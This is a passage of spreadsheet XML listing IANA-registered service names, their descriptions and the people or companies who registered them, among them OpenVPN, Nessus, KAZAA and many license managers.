    <t>alias</t>
  </si>
  <si>
    <t>Alias Service</t>
  </si>
  <si>
    <t>[Paul_Tokarchuk]</t>
  </si>
  <si>
    <t>hp-webadmin</t>
  </si>
  <si>
    <t>HP Web Admin</t>
  </si>
  <si>
    <t>[Lance_Kind]</t>
  </si>
  <si>
    <t>unet</t>
  </si>
  <si>
    <t>Unet Connection</t>
  </si>
  <si>
    <t>[Anthony_Stahler]</t>
  </si>
  <si>
    <t>commlinx-avl</t>
  </si>
  <si>
    <t>CommLinx GPS / AVL System</t>
  </si>
  <si>
    <t>[Peter_Johnson]</t>
  </si>
  <si>
    <t>gpfs</t>
  </si>
  <si>
    <t>General Parallel File System</t>
  </si>
  <si>
    <t>[Dave_Craft]</t>
  </si>
  <si>
    <t>caids-sensor</t>
  </si>
  <si>
    <t>caids sensors channel</t>
  </si>
  <si>
    <t>[Gregory_Hostettler]</t>
  </si>
  <si>
    <t>fiveacross</t>
  </si>
  <si>
    <t>Five Across Server</t>
  </si>
  <si>
    <t>[Glenn_Reid]</t>
  </si>
  <si>
    <t>openvpn</t>
  </si>
  <si>
    <t>OpenVPN</t>
  </si>
  <si>
    <t>[James_Yonan]</t>
  </si>
  <si>
    <t>rsf-1</t>
  </si>
  <si>
    <t>RSF-1 clustering</t>
  </si>
  <si>
    <t>[Dave_Hines]</t>
  </si>
  <si>
    <t>netmagic</t>
  </si>
  <si>
    <t>Network Magic</t>
  </si>
  <si>
    <t>[Nick_Holt]</t>
  </si>
  <si>
    <t>carrius-rshell</t>
  </si>
  <si>
    <t>Carrius Remote Access</t>
  </si>
  <si>
    <t>[Gerry_Dubois]</t>
  </si>
  <si>
    <t>cajo-discovery</t>
  </si>
  <si>
    <t>cajo reference discovery</t>
  </si>
  <si>
    <t>[John_Catherino]</t>
  </si>
  <si>
    <t>dmidi</t>
  </si>
  <si>
    <t>DMIDI</t>
  </si>
  <si>
    <t>[Phil_Kerr]</t>
  </si>
  <si>
    <t>scol</t>
  </si>
  <si>
    <t>SCOL</t>
  </si>
  <si>
    <t>[Cryo_Networks]</t>
  </si>
  <si>
    <t>nucleus-sand</t>
  </si>
  <si>
    <t>Nucleus Sand Database Server</t>
  </si>
  <si>
    <t>[James_Marsh]</t>
  </si>
  <si>
    <t>caiccipc</t>
  </si>
  <si>
    <t>[Vince_Re]</t>
  </si>
  <si>
    <t>ssslic-mgr</t>
  </si>
  <si>
    <t>License Validation</t>
  </si>
  <si>
    <t>ssslog-mgr</t>
  </si>
  <si>
    <t>Log Request Listener</t>
  </si>
  <si>
    <t>[Eric_Bruno]</t>
  </si>
  <si>
    <t>accord-mgc</t>
  </si>
  <si>
    <t>Accord-MGC</t>
  </si>
  <si>
    <t>[Roni_Even]</t>
  </si>
  <si>
    <t>anthony-data</t>
  </si>
  <si>
    <t>Anthony Data</t>
  </si>
  <si>
    <t>[Paul_Dollemore]</t>
  </si>
  <si>
    <t>metasage</t>
  </si>
  <si>
    <t>MetaSage</t>
  </si>
  <si>
    <t>[Peter_Anvelt]</t>
  </si>
  <si>
    <t>seagull-ais</t>
  </si>
  <si>
    <t>SEAGULL AIS</t>
  </si>
  <si>
    <t>[Lee_Breisacher]</t>
  </si>
  <si>
    <t>ipcd3</t>
  </si>
  <si>
    <t>IPCD3</t>
  </si>
  <si>
    <t>[Mark_Ciskey]</t>
  </si>
  <si>
    <t>eoss</t>
  </si>
  <si>
    <t>EOSS</t>
  </si>
  <si>
    <t>[Robert_Armes]</t>
  </si>
  <si>
    <t>groove-dpp</t>
  </si>
  <si>
    <t>Groove DPP</t>
  </si>
  <si>
    <t>[Ken_Moore]</t>
  </si>
  <si>
    <t>lupa</t>
  </si>
  <si>
    <t>[Barney_Wolff]</t>
  </si>
  <si>
    <t>mpc-lifenet</t>
  </si>
  <si>
    <t>Medtronic/Physio-Control LIFENET</t>
  </si>
  <si>
    <t>[Physio-Control_Inc]</t>
  </si>
  <si>
    <t>[Kevin_Drew]</t>
  </si>
  <si>
    <t>kazaa</t>
  </si>
  <si>
    <t>KAZAA</t>
  </si>
  <si>
    <t>[Ahti_Heinla]</t>
  </si>
  <si>
    <t>scanstat-1</t>
  </si>
  <si>
    <t>scanSTAT 1.0</t>
  </si>
  <si>
    <t>[William_Scheding]</t>
  </si>
  <si>
    <t>etebac5</t>
  </si>
  <si>
    <t>ETEBAC 5</t>
  </si>
  <si>
    <t>[Jean_Louis_Barbut]</t>
  </si>
  <si>
    <t>hpss-ndapi</t>
  </si>
  <si>
    <t>HPSS NonDCE Gateway</t>
  </si>
  <si>
    <t>[Michael_Gleicher]</t>
  </si>
  <si>
    <t>aeroflight-ads</t>
  </si>
  <si>
    <t>AeroFlight-ADs</t>
  </si>
  <si>
    <t>aeroflight-ret</t>
  </si>
  <si>
    <t>AeroFlight-Ret</t>
  </si>
  <si>
    <t>[Eric_Johnson]</t>
  </si>
  <si>
    <t>qt-serveradmin</t>
  </si>
  <si>
    <t>QT SERVER ADMIN</t>
  </si>
  <si>
    <t>[Chris_LeCroy]</t>
  </si>
  <si>
    <t>sweetware-apps</t>
  </si>
  <si>
    <t>SweetWARE Apps</t>
  </si>
  <si>
    <t>[David_Dunetz]</t>
  </si>
  <si>
    <t>nerv</t>
  </si>
  <si>
    <t>SNI R&amp;D network</t>
  </si>
  <si>
    <t>[Martin_Freiss]</t>
  </si>
  <si>
    <t>tgp</t>
  </si>
  <si>
    <t>TrulyGlobal Protocol</t>
  </si>
  <si>
    <t>[Gur_Kimchi]</t>
  </si>
  <si>
    <t>vpnz</t>
  </si>
  <si>
    <t>VPNz</t>
  </si>
  <si>
    <t>[Tom_Strack]</t>
  </si>
  <si>
    <t>slinkysearch</t>
  </si>
  <si>
    <t>SLINKYSEARCH</t>
  </si>
  <si>
    <t>[Desmond_Chan]</t>
  </si>
  <si>
    <t>stgxfws</t>
  </si>
  <si>
    <t>STGXFWS</t>
  </si>
  <si>
    <t>[Tetsuya_Shioda]</t>
  </si>
  <si>
    <t>dns2go</t>
  </si>
  <si>
    <t>DNS2Go</t>
  </si>
  <si>
    <t>[Deerfield_Communications_Inc]</t>
  </si>
  <si>
    <t>[Mike_Courterier]</t>
  </si>
  <si>
    <t>florence</t>
  </si>
  <si>
    <t>FLORENCE</t>
  </si>
  <si>
    <t>[Brian_Trammell]</t>
  </si>
  <si>
    <t>zented</t>
  </si>
  <si>
    <t>ZENworks Tiered Electronic Distribution</t>
  </si>
  <si>
    <t>[Ty_Ellis]</t>
  </si>
  <si>
    <t>periscope</t>
  </si>
  <si>
    <t>Periscope</t>
  </si>
  <si>
    <t>[Kevin_Madden]</t>
  </si>
  <si>
    <t>menandmice-lpm</t>
  </si>
  <si>
    <t>[Sigfus_Magnusson]</t>
  </si>
  <si>
    <t>first-defense</t>
  </si>
  <si>
    <t>Remote systems monitoring</t>
  </si>
  <si>
    <t>[Nexum]</t>
  </si>
  <si>
    <t>[Michael_Fread]</t>
  </si>
  <si>
    <t>Microsoft (unoffically) using 1232</t>
  </si>
  <si>
    <t>univ-appserver</t>
  </si>
  <si>
    <t>Universal App Server</t>
  </si>
  <si>
    <t>[Tim_Sent]</t>
  </si>
  <si>
    <t>search-agent</t>
  </si>
  <si>
    <t>Infoseek Search Agent</t>
  </si>
  <si>
    <t>[Jackie_Wu]</t>
  </si>
  <si>
    <t>mosaicsyssvc1</t>
  </si>
  <si>
    <t>[Brian_Matthews]</t>
  </si>
  <si>
    <t>bvcontrol</t>
  </si>
  <si>
    <t>[Daniel_J_Walsh]</t>
  </si>
  <si>
    <t>tsdos390</t>
  </si>
  <si>
    <t>[Ben_Pracht]</t>
  </si>
  <si>
    <t>hacl-qs</t>
  </si>
  <si>
    <t>[Farid_Faez]</t>
  </si>
  <si>
    <t>nmsd</t>
  </si>
  <si>
    <t>NMSD</t>
  </si>
  <si>
    <t>instantia</t>
  </si>
  <si>
    <t>Instantia</t>
  </si>
  <si>
    <t>[Ruth_Slater]</t>
  </si>
  <si>
    <t>nessus</t>
  </si>
  <si>
    <t>[Jordan_Hrycaj]</t>
  </si>
  <si>
    <t>nmasoverip</t>
  </si>
  <si>
    <t>NMAS over IP</t>
  </si>
  <si>
    <t>[Hal_Henderson]</t>
  </si>
  <si>
    <t>serialgateway</t>
  </si>
  <si>
    <t>SerialGateway</t>
  </si>
  <si>
    <t>[Stephen_LaValley]</t>
  </si>
  <si>
    <t>isbconference1</t>
  </si>
  <si>
    <t>isbconference2</t>
  </si>
  <si>
    <t>[Arnold_Dittmann]</t>
  </si>
  <si>
    <t>payrouter</t>
  </si>
  <si>
    <t>[David_Wilson]</t>
  </si>
  <si>
    <t>visionpyramid</t>
  </si>
  <si>
    <t>VisionPyramid</t>
  </si>
  <si>
    <t>[Gavin_Hutchinson]</t>
  </si>
  <si>
    <t>hermes</t>
  </si>
  <si>
    <t>mesavistaco</t>
  </si>
  <si>
    <t>Mesa Vista Co</t>
  </si>
  <si>
    <t>[Rick_LaBanca]</t>
  </si>
  <si>
    <t>swldy-sias</t>
  </si>
  <si>
    <t>[Peter_E_Williams]</t>
  </si>
  <si>
    <t>servergraph</t>
  </si>
  <si>
    <t>[Lindsay_Morris]</t>
  </si>
  <si>
    <t>bspne-pcc</t>
  </si>
  <si>
    <t>q55-pcc</t>
  </si>
  <si>
    <t>[Prem_Tirilok]</t>
  </si>
  <si>
    <t>de-noc</t>
  </si>
  <si>
    <t>de-cache-query</t>
  </si>
  <si>
    <t>de-server</t>
  </si>
  <si>
    <t>[Jeff_Burdette]</t>
  </si>
  <si>
    <t>shockwave2</t>
  </si>
  <si>
    <t>Shockwave 2</t>
  </si>
  <si>
    <t>[Dave_Simmons]</t>
  </si>
  <si>
    <t>opennl</t>
  </si>
  <si>
    <t>Open Network Library</t>
  </si>
  <si>
    <t>[Phil_Frisbie]</t>
  </si>
  <si>
    <t>opennl-voice</t>
  </si>
  <si>
    <t>Open Network Library Voice</t>
  </si>
  <si>
    <t>ibm-ssd</t>
  </si>
  <si>
    <t>[Barry_Whyte]</t>
  </si>
  <si>
    <t>mpshrsv</t>
  </si>
  <si>
    <t>[Makoto_Ikeyama]</t>
  </si>
  <si>
    <t>qnts-orb</t>
  </si>
  <si>
    <t>QNTS-ORB</t>
  </si>
  <si>
    <t>[Raghurama_Bhat]</t>
  </si>
  <si>
    <t>dka</t>
  </si>
  <si>
    <t>[Chris_Griffin]</t>
  </si>
  <si>
    <t>prat</t>
  </si>
  <si>
    <t>PRAT</t>
  </si>
  <si>
    <t>[Keith_Wood]</t>
  </si>
  <si>
    <t>dssiapi</t>
  </si>
  <si>
    <t>DSSIAPI</t>
  </si>
  <si>
    <t>[Jim_Turner]</t>
  </si>
  <si>
    <t>dellpwrappks</t>
  </si>
  <si>
    <t>DELLPWRAPPKS</t>
  </si>
  <si>
    <t>[David_Troeger]</t>
  </si>
  <si>
    <t>epc</t>
  </si>
  <si>
    <t>eTrust Policy Compliance</t>
  </si>
  <si>
    <t>[Aaron_Stein]</t>
  </si>
  <si>
    <t>propel-msgsys</t>
  </si>
  <si>
    <t>PROPEL-MSGSYS</t>
  </si>
  <si>
    <t>[Bert_Van_der_Linden]</t>
  </si>
  <si>
    <t>watilapp</t>
  </si>
  <si>
    <t>WATiLaPP</t>
  </si>
  <si>
    <t>[Frederic_Weymann]</t>
  </si>
  <si>
    <t>opsmgr</t>
  </si>
  <si>
    <t>Microsoft Operations Manager</t>
  </si>
  <si>
    <t>[Ashvin_Sanghvi]</t>
  </si>
  <si>
    <t>excw</t>
  </si>
  <si>
    <t>eXcW</t>
  </si>
  <si>
    <t>[Norm_Freedman]</t>
  </si>
  <si>
    <t>cspmlockmgr</t>
  </si>
  <si>
    <t>CSPMLockMgr</t>
  </si>
  <si>
    <t>[Ibtsam_Mahfouz]</t>
  </si>
  <si>
    <t>emc-gateway</t>
  </si>
  <si>
    <t>EMC-Gateway</t>
  </si>
  <si>
    <t>[Rene_Fontaine]</t>
  </si>
  <si>
    <t>t1distproc</t>
  </si>
  <si>
    <t>[Julian_Biddle]</t>
  </si>
  <si>
    <t>ivcollector</t>
  </si>
  <si>
    <t>This entry has been removed on 2014-05-23.</t>
  </si>
  <si>
    <t>miva-mqs</t>
  </si>
  <si>
    <t>mqs</t>
  </si>
  <si>
    <t>[Miva_Corporation]</t>
  </si>
  <si>
    <t>dellwebadmin-1</t>
  </si>
  <si>
    <t>Dell Web Admin 1</t>
  </si>
  <si>
    <t>[Bridget_Navoda]</t>
  </si>
  <si>
    <t>dellwebadmin-2</t>
  </si>
  <si>
    <t>Dell Web Admin 2</t>
  </si>
  <si>
    <t>pictrography</t>
  </si>
  <si>
    <t>Pictrography</t>
  </si>
  <si>
    <t>[Takashi_Hoshino]</t>
  </si>
  <si>
    <t>healthd</t>
  </si>
  <si>
    <t>[James_E_Housley]</t>
  </si>
  <si>
    <t>emperion</t>
  </si>
  <si>
    <t>Emperion</t>
  </si>
  <si>
    <t>[Claus_Thor_Barth]</t>
  </si>
  <si>
    <t>productinfo</t>
  </si>
  <si>
    <t>Product Information</t>
  </si>
  <si>
    <t>iee-qfx</t>
  </si>
  <si>
    <t>IEE-QFX</t>
  </si>
  <si>
    <t>[Mehrdad_Ashtiani]</t>
  </si>
  <si>
    <t>neoiface</t>
  </si>
  <si>
    <t>[Jason_McManus]</t>
  </si>
  <si>
    <t>netuitive</t>
  </si>
  <si>
    <t>[JF_Huard]</t>
  </si>
  <si>
    <t>routematch</t>
  </si>
  <si>
    <t>RouteMatch Com</t>
  </si>
  <si>
    <t>[Jeff_Jones]</t>
  </si>
  <si>
    <t>navbuddy</t>
  </si>
  <si>
    <t>NavBuddy</t>
  </si>
  <si>
    <t>[Eric_Hackman]</t>
  </si>
  <si>
    <t>jwalkserver</t>
  </si>
  <si>
    <t>JWalkServer</t>
  </si>
  <si>
    <t>winjaserver</t>
  </si>
  <si>
    <t>WinJaServer</t>
  </si>
  <si>
    <t>seagulllms</t>
  </si>
  <si>
    <t>SEAGULLLMS</t>
  </si>
  <si>
    <t>dsdn</t>
  </si>
  <si>
    <t>[Stanislaw_Skowronek]</t>
  </si>
  <si>
    <t>pkt-krb-ipsec</t>
  </si>
  <si>
    <t>PKT-KRB-IPSec</t>
  </si>
  <si>
    <t>[Nancy_Davoust]</t>
  </si>
  <si>
    <t>cmmdriver</t>
  </si>
  <si>
    <t>CMMdriver</t>
  </si>
  <si>
    <t>[Lutz_Karras]</t>
  </si>
  <si>
    <t>ehtp</t>
  </si>
  <si>
    <t>End-by-Hop Transmission Protocol</t>
  </si>
  <si>
    <t>[Alexander_Bogdanov]</t>
  </si>
  <si>
    <t>dproxy</t>
  </si>
  <si>
    <t>sdproxy</t>
  </si>
  <si>
    <t>[Raimond_Diederik]</t>
  </si>
  <si>
    <t>lpcp</t>
  </si>
  <si>
    <t>[Christian_Stredicke]</t>
  </si>
  <si>
    <t>hp-sci</t>
  </si>
  <si>
    <t>[Kim_Scott]</t>
  </si>
  <si>
    <t>h323hostcallsc</t>
  </si>
  <si>
    <t>H.323 Secure Call Control Signalling</t>
  </si>
  <si>
    <t>[ITU-T]</t>
  </si>
  <si>
    <t>[ITU-T_TSB]</t>
  </si>
  <si>
    <t>De-Assigned on 2019-10-30</t>
  </si>
  <si>
    <t>sftsrv</t>
  </si>
  <si>
    <t>[Robert_Frazier]</t>
  </si>
  <si>
    <t>boomerang</t>
  </si>
  <si>
    <t>Boomerang</t>
  </si>
  <si>
    <t>[Bruce_Lueckenhoff]</t>
  </si>
  <si>
    <t>pe-mike</t>
  </si>
  <si>
    <t>[Stephen_Hemminger]</t>
  </si>
  <si>
    <t>re-conn-proto</t>
  </si>
  <si>
    <t>RE-Conn-Proto</t>
  </si>
  <si>
    <t>[Sandeep_Singhal]</t>
  </si>
  <si>
    <t>pacmand</t>
  </si>
  <si>
    <t>Pacmand</t>
  </si>
  <si>
    <t>[Edward_T_O_Shea]</t>
  </si>
  <si>
    <t>odsi</t>
  </si>
  <si>
    <t>Optical Domain Service Interconnect (ODSI)</t>
  </si>
  <si>
    <t>[K_Arvind]</t>
  </si>
  <si>
    <t>jtag-server</t>
  </si>
  <si>
    <t>JTAG server</t>
  </si>
  <si>
    <t>[Andrew_Draper]</t>
  </si>
  <si>
    <t>husky</t>
  </si>
  <si>
    <t>Husky</t>
  </si>
  <si>
    <t>[Mark_Zang]</t>
  </si>
  <si>
    <t>rxmon</t>
  </si>
  <si>
    <t>RxMon</t>
  </si>
  <si>
    <t>[Javier_Jiminez]</t>
  </si>
  <si>
    <t>sti-envision</t>
  </si>
  <si>
    <t>STI Envision</t>
  </si>
  <si>
    <t>[Don_Stedman]</t>
  </si>
  <si>
    <t>bmc-patroldb</t>
  </si>
  <si>
    <t>BMC_PATROLDB
IANA assigned this well-formed service name as a replacement for "bmc_patroldb".</t>
  </si>
  <si>
    <t>bmc_patroldb</t>
  </si>
  <si>
    <t>BMC_PATROLDB</t>
  </si>
  <si>
    <t>This entry is an alias to "bmc-patroldb".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>pdps</t>
  </si>
  <si>
    <t>Photoscript Distributed Printing System</t>
  </si>
  <si>
    <t>[Les_Klein]</t>
  </si>
  <si>
    <t>els</t>
  </si>
  <si>
    <t>E.L.S., Event Listener Service</t>
  </si>
  <si>
    <t>[Jim_Cleppe]</t>
  </si>
  <si>
    <t>exbit-escp</t>
  </si>
  <si>
    <t>Exbit-ESCP</t>
  </si>
  <si>
    <t>[Morten_Christensen]</t>
  </si>
  <si>
    <t>vrts-ipcserver</t>
  </si>
  <si>
    <t>[Bruce_Hestand]</t>
  </si>
  <si>
    <t>krb5gatekeeper</t>
  </si>
  <si>
    <t>[Patrick_Moore]</t>
  </si>
  <si>
    <t>amx-icsp</t>
  </si>
  <si>
    <t>AMX-ICSP</t>
  </si>
  <si>
    <t>[Jeff_Burch]</t>
  </si>
  <si>
    <t>amx-axbnet</t>
  </si>
  <si>
    <t>AMX-AXBNET</t>
  </si>
  <si>
    <t>novation</t>
  </si>
  <si>
    <t>Novation</t>
  </si>
  <si>
    <t>[Alan_Dano]</t>
  </si>
  <si>
    <t>brcd</t>
  </si>
  <si>
    <t>[Todd_Picquelle]</t>
  </si>
  <si>
    <t>delta-mcp</t>
  </si>
  <si>
    <t>[Quinton_Tormanen]</t>
  </si>
  <si>
    <t>dx-instrument</t>
  </si>
  <si>
    <t>DX-Instrument</t>
  </si>
  <si>
    <t>[Walt_Modic]</t>
  </si>
  <si>
    <t>wimsic</t>
  </si>
  <si>
    <t>WIMSIC</t>
  </si>
  <si>
    <t>[James_Brown]</t>
  </si>
  <si>
    <t>ultrex</t>
  </si>
  <si>
    <t>Ultrex</t>
  </si>
  <si>
    <t>[Tim_Walsh]</t>
  </si>
  <si>
    <t>ewall</t>
  </si>
  <si>
    <t>EWALL</t>
  </si>
  <si>
    <t>[Jeff_Busma]</t>
  </si>
  <si>
    <t>netdb-export</t>
  </si>
  <si>
    <t>[Konstantinos_Kostis]</t>
  </si>
  <si>
    <t>streetperfect</t>
  </si>
  <si>
    <t>StreetPerfect</t>
  </si>
  <si>
    <t>[Michael_R_Young]</t>
  </si>
  <si>
    <t>intersan</t>
  </si>
  <si>
    <t>[Barry_H_Feild]</t>
  </si>
  <si>
    <t>pcia-rxp-b</t>
  </si>
  <si>
    <t>PCIA RXP-B</t>
  </si>
  <si>
    <t>[James_Dabbs]</t>
  </si>
  <si>
    <t>passwrd-policy</t>
  </si>
  <si>
    <t>Password Policy</t>
  </si>
  <si>
    <t>[Tonio_Pirotta]</t>
  </si>
  <si>
    <t>writesrv</t>
  </si>
  <si>
    <t>[Marvin_Toungate]</t>
  </si>
  <si>
    <t>digital-notary</t>
  </si>
  <si>
    <t>Digital Notary Protocol</t>
  </si>
  <si>
    <t>[Wes_Doonan]</t>
  </si>
  <si>
    <t>ischat</t>
  </si>
  <si>
    <t>Instant Service Chat</t>
  </si>
  <si>
    <t>[Mike_Clise]</t>
  </si>
  <si>
    <t>menandmice-dns</t>
  </si>
  <si>
    <t>menandmice DNS</t>
  </si>
  <si>
    <t>wmc-log-svc</t>
  </si>
  <si>
    <t>WMC-log-svr</t>
  </si>
  <si>
    <t>[Scott_Anderson]</t>
  </si>
  <si>
    <t>kjtsiteserver</t>
  </si>
  <si>
    <t>[Jason_Aubain]</t>
  </si>
  <si>
    <t>naap</t>
  </si>
  <si>
    <t>NAAP</t>
  </si>
  <si>
    <t>[Henry_Haverinen]</t>
  </si>
  <si>
    <t>qubes</t>
  </si>
  <si>
    <t>QuBES</t>
  </si>
  <si>
    <t>[Eric_Grange]</t>
  </si>
  <si>
    <t>esbroker</t>
  </si>
  <si>
    <t>ESBroker</t>
  </si>
  <si>
    <t>[Alexander_Medvinsky]</t>
  </si>
  <si>
    <t>re101</t>
  </si>
  <si>
    <t>[Doriano_Blengino]</t>
  </si>
  <si>
    <t>icap</t>
  </si>
  <si>
    <t>ICAP</t>
  </si>
  <si>
    <t>[Jeremy_Elson]</t>
  </si>
  <si>
    <t>vpjp</t>
  </si>
  <si>
    <t>VPJP</t>
  </si>
  <si>
    <t>[Michael_Collins]</t>
  </si>
  <si>
    <t>alta-ana-lm</t>
  </si>
  <si>
    <t>Alta Analytics License Manager</t>
  </si>
  <si>
    <t>bbn-mmc</t>
  </si>
  <si>
    <t>multi media conferencing</t>
  </si>
  <si>
    <t>bbn-mmx</t>
  </si>
  <si>
    <t>sbook</t>
  </si>
  <si>
    <t>Registration Network Protocol</t>
  </si>
  <si>
    <t>editbench</t>
  </si>
  <si>
    <t>[Simson_L_Garfinkel]</t>
  </si>
  <si>
    <t>equationbuilder</t>
  </si>
  <si>
    <t>Digital Tool Works (MIT)</t>
  </si>
  <si>
    <t>[Terrence_J_Talbot]</t>
  </si>
  <si>
    <t>lotusnote</t>
  </si>
  <si>
    <t>Lotus Note</t>
  </si>
  <si>
    <t>[Greg_Pflaum]</t>
  </si>
  <si>
    <t>1992-07</t>
  </si>
  <si>
    <t>relief</t>
  </si>
  <si>
    <t>Relief Consulting</t>
  </si>
  <si>
    <t>[John_Feiler]</t>
  </si>
  <si>
    <t>XSIP-network</t>
  </si>
  <si>
    <t>Five Across XSIP Network</t>
  </si>
  <si>
    <t>intuitive-edge</t>
  </si>
  <si>
    <t>Intuitive Edge</t>
  </si>
  <si>
    <t>[Montgomery_Zukowski]</t>
  </si>
  <si>
    <t>cuillamartin</t>
  </si>
  <si>
    <t>CuillaMartin Company</t>
  </si>
  <si>
    <t>pegboard</t>
  </si>
  <si>
    <t>Electronic PegBoard</t>
  </si>
  <si>
    <t>[Chris_Cuilla]</t>
  </si>
  <si>
    <t>connlcli</t>
  </si>
  <si>
    <t>CONNLCLI</t>
  </si>
  <si>
    <t>ftsrv</t>
  </si>
  <si>
    <t>FTSRV</t>
  </si>
  <si>
    <t>[Ines_Homem_de_Melo]</t>
  </si>
  <si>
    <t>mimer</t>
  </si>
  <si>
    <t>MIMER</t>
  </si>
  <si>
    <t>[Per_Schroeder]</t>
  </si>
  <si>
    <t>linx</t>
  </si>
  <si>
    <t>LinX</t>
  </si>
  <si>
    <t>[Steffen_Schilke]</t>
  </si>
  <si>
    <t>timeflies</t>
  </si>
  <si>
    <t>TimeFlies</t>
  </si>
  <si>
    <t>[Doug_Kent]</t>
  </si>
  <si>
    <t>ndm-requester</t>
  </si>
  <si>
    <t>Network DataMover Requester</t>
  </si>
  <si>
    <t>ndm-server</t>
  </si>
  <si>
    <t>Network DataMover Server</t>
  </si>
  <si>
    <t>[Toshio_Watanabe]</t>
  </si>
  <si>
    <t>adapt-sna</t>
  </si>
  <si>
    <t>Network Software Associates</t>
  </si>
  <si>
    <t>[Jeffery_Chiao]</t>
  </si>
  <si>
    <t>netware-csp</t>
  </si>
  <si>
    <t>Novell NetWare Comm Service Platform</t>
  </si>
  <si>
    <t>[Laurie_Lindsey]</t>
  </si>
  <si>
    <t>dcs</t>
  </si>
  <si>
    <t>DCS</t>
  </si>
  <si>
    <t>[Stefan_Siebert]</t>
  </si>
  <si>
    <t>screencast</t>
  </si>
  <si>
    <t>ScreenCast</t>
  </si>
  <si>
    <t>[Bill_Tschumy]</t>
  </si>
  <si>
    <t>gv-us</t>
  </si>
  <si>
    <t>GlobalView to Unix Shell</t>
  </si>
  <si>
    <t>us-gv</t>
  </si>
  <si>
    <t>Unix Shell to GlobalView</t>
  </si>
  <si>
    <t>[Makoto_Mita]</t>
  </si>
  <si>
    <t>fc-cli</t>
  </si>
  <si>
    <t>Fujitsu Config Protocol</t>
  </si>
  <si>
    <t>fc-ser</t>
  </si>
  <si>
    <t>[Ryuichi_Horie]</t>
  </si>
  <si>
    <t>chromagrafx</t>
  </si>
  <si>
    <t>Chromagrafx</t>
  </si>
  <si>
    <t>[Mike_Barthelemy]</t>
  </si>
  <si>
    <t>molly</t>
  </si>
  <si>
    <t>EPI Software Systems</t>
  </si>
  <si>
    <t>[Jim_Vlcek]</t>
  </si>
  <si>
    <t>bytex</t>
  </si>
  <si>
    <t>Bytex</t>
  </si>
  <si>
    <t>[Mary_Ann_Burt]</t>
  </si>
  <si>
    <t>ibm-pps</t>
  </si>
  <si>
    <t>IBM Person to Person Software</t>
  </si>
  <si>
    <t>[Simon_Phipps]</t>
  </si>
  <si>
    <t>cichlid</t>
  </si>
  <si>
    <t>Cichlid License Manager</t>
  </si>
  <si>
    <t>[Andy_Burgess]</t>
  </si>
  <si>
    <t>elan</t>
  </si>
  <si>
    <t>Elan License Manager</t>
  </si>
  <si>
    <t>[Ken_Greer]</t>
  </si>
  <si>
    <t>dbreporter</t>
  </si>
  <si>
    <t>Integrity Solutions</t>
  </si>
  <si>
    <t>[Tim_Dawson]</t>
  </si>
  <si>
    <t>telesis-licman</t>
  </si>
  <si>
    <t>Telesis Network License Manager</t>
  </si>
  <si>
    <t>[Karl_Schendel_Jr]</t>
  </si>
  <si>
    <t>apple-licman</t>
  </si>
  <si>
    <t>Apple Network License Manager</t>
  </si>
  <si>
    <t>[Earl_Wallace]</t>
  </si>
  <si>
    <t>udt-os</t>
  </si>
  <si>
    <t>udt_os
IANA assigned this well-formed service name as a replacement for "udt_os".</t>
  </si>
  <si>
    <t>udt_os</t>
  </si>
  <si>
    <t>This entry is an alias to "udt-os".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>gwha</t>
  </si>
  <si>
    <t>GW Hannaway Network License Manager</t>
  </si>
  <si>
    <t>[J_Gabriel_Foster]</t>
  </si>
  <si>
    <t>os-licman</t>
  </si>
  <si>
    <t>Objective Solutions License Manager</t>
  </si>
  <si>
    <t>[Donald_Cornwell]</t>
  </si>
  <si>
    <t>atex-elmd</t>
  </si>
  <si>
    <t>Atex Publishing License Manager
IANA assigned this well-formed service name as a replacement for "atex_elmd".</t>
  </si>
  <si>
    <t>[Brett_Sorenson]</t>
  </si>
  <si>
    <t>atex_elmd</t>
  </si>
  <si>
    <t>Atex Publishing License Manager</t>
  </si>
  <si>
    <t>This entry is an alias to "atex-elmd".
This entry is now historic, not usable for use with many
common service discovery mechanisms.</t>
  </si>
  <si>
    <t>checksum</t>
  </si>
  <si>
    <t>CheckSum License Manager</t>
  </si>
  <si>
    <t>[Andreas_Glocker]</t>
  </si>
  <si>
    <t>cadsi-lm</t>
  </si>
  <si>
    <t>Computer Aided Design Software Inc LM</t>
  </si>
  <si>
    <t>[Sulistio_Muljadi]</t>
  </si>
  <si>
    <t>objective-dbc</t>
  </si>
  <si>
    <t>Objective Solutions DataBase Cache</t>
  </si>
  <si>
    <t>[Donald_Cornwell_2]</t>
  </si>
  <si>
    <t>iclpv-dm</t>
  </si>
  <si>
    <t>Document Manager</t>
  </si>
  <si>
    <t>iclpv-sc</t>
  </si>
  <si>
    <t>Storage Controller</t>
  </si>
  <si>
    <t>iclpv-sas</t>
  </si>
  <si>
    <t>Storage Access Server</t>
  </si>
  <si>
    <t>iclpv-pm</t>
  </si>
  <si>
    <t>Print Manager</t>
  </si>
  <si>
    <t>iclpv-nls</t>
  </si>
  <si>
    <t>Network Log Server</t>
  </si>
  <si>
    <t>iclpv-nlc</t>
  </si>
  <si>
    <t>Network Log Client</t>
  </si>
  <si>
    <t>iclpv-wsm</t>
  </si>
  <si>
    <t>PC Workstation Manager software</t>
  </si>
  <si>
    <t>[A_P_Hobson]</t>
  </si>
  <si>
    <t>dvl-activemail</t>
  </si>
  <si>
    <t>DVL Active Mail</t>
  </si>
  <si>
    <t>audio-activmail</t>
  </si>
  <si>
    <t>Audio Active Mail</t>
  </si>
  <si>
    <t>video-activmail</t>
  </si>
  <si>
    <t>Video Active Mail</t>
  </si>
  <si>
    <t>[Avshalom_Houri]</t>
  </si>
  <si>
    <t>cadkey-licman</t>
  </si>
  <si>
    <t>Cadkey License Manager</t>
  </si>
  <si>
    <t>cadkey-tablet</t>
  </si>
  <si>
    <t>Cadkey Tablet Daemon</t>
  </si>
  <si>
    <t>[Joe_McCollough]</t>
  </si>
  <si>
    <t>goldleaf-licman</t>
  </si>
  <si>
    <t>Goldleaf License Manager</t>
  </si>
  <si>
    <t>[John_Fox]</t>
  </si>
  <si>
    <t>prm-sm-np</t>
  </si>
  <si>
    <t>Prospero Resource Manager</t>
  </si>
  <si>
    <t>prm-nm-np</t>
  </si>
  <si>
    <t>igi-lm</t>
  </si>
  <si>
    <t>Infinite Graphics License Manager</t>
  </si>
  <si>
    <t>ibm-res</t>
  </si>
  <si>
    <t>IBM Remote Execution Starter</t>
  </si>
  <si>
    <t>netlabs-lm</t>
  </si>
  <si>
    <t>NetLabs License Manager</t>
  </si>
  <si>
    <t>tibet-server</t>
  </si>
  <si>
    <t>TIBET Data Server</t>
  </si>
  <si>
